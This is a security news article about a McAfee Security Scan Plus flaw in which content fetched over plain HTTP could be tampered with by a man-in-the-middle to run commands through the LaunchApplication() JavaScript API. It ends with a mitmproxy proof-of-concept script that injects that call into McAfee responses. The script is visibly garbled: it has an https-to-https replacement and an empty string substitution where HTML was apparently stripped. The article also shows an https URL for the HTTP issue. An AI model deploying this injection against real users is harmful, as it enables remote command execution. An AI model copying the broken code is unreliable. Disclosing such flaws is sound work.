McAfee Security Scan Plus: You've read many times on this website about security companies' negligence . It's McAfee's time. The company is reportedly fixing a bug in its free Security Scan Plus tool that retrieves information from users' computers via HTTP, i.e. in plain text format.
The company seems to have forgotten what it preaches, or assumed that it was impossible for anyone to think of carrying out man-in-the-middle attacks on its services, such as free online scanning, but also on internal advertisements and the UI that displays them.
The vulnerability was discovered by SecuriTeam, which reports that McAfee's tool "retrieves information from different mcafee.com domains and displays it to the user, usually in the main application window."
Since the HTTPS protocol is not used to transfer this information, the information can be modified by an attacker, who can then exploit the library that the tool calls (MCBRWSR2.DLL) to display any HTML content they desire.
This library exposes the JavaScript LaunchApplication() API, which simply means that an attacker can execute any command they want on the victim.
McAfee Security Scan Plus, after each scan, displays a UI element indicating the “protection level” of the target at the following URL:
https://home.mcafee.com/SecurityScanner/SSBanner.aspx
The information is displayed on the online scan progress screen, so the user can easily think that their computer is clean, when in fact it has just been compromised.
If you are now in the attacker's shoes, and you are performing a MITM attack, it is quite easy to run commands with the privileges of the logged in user, which in many cases is the same account as the administrator.
The full PoC only requires 38 lines of code. McAfee acknowledged the issue here and patched the service in July.
View the PoC code
#!/usr/bin/env python3 # # HTTP proxy mode: # mitmproxy -s mcsploit_inline.py --ignore '.*' # # Transparent proxy mode: # mitmproxy -s mcsploit_inline.py -T # from mitmproxy import ctx, http import requests import time COMMAND="c:\\\\windows\\\\system32\\\\calc.exe" CMDARGS="" def response(flow): if flow.request.scheme == "http" and (flow.request.headers['host'].endswith("mcafee.com") or "mcafee" in flow.request.url): if flow.response.status_code == 302: ctx.log("[+] [MCPLOIT] Insecure McAfee request found! (HTML)") https_url=flow.request.url.replace("https://","https://") r=requests.get(https_url,headers=flow.request.headers,verify=False) if "text/html" not in r.headers['content-type']: return contents=r.text contents=contents.replace("","" % (COMMAND, CMDARGS)) flow.response = http.HTTPResponse.make(200,bytes(contents,encoding="utf-8"),{"Content-Type": "text/html; charset=utf-8","Expires":"-1"}) return try: if flow.response.headers["content-type"] == "text/javascript": ctx.log("[+] [MCPLOIT] Insecure McAfee request found! (JS)") inject="try{window.external.LaunchApplication(\"%s\",\"%s\");}catch(launchapperr){var x;}\n" % (COMMAND, CMDARGS) try: flow.response.contents = inject + flow.response.contents except AttributeError: ctx.log("[-] [MCSPLOIT] No content in the original response!") pass except KeyError: pass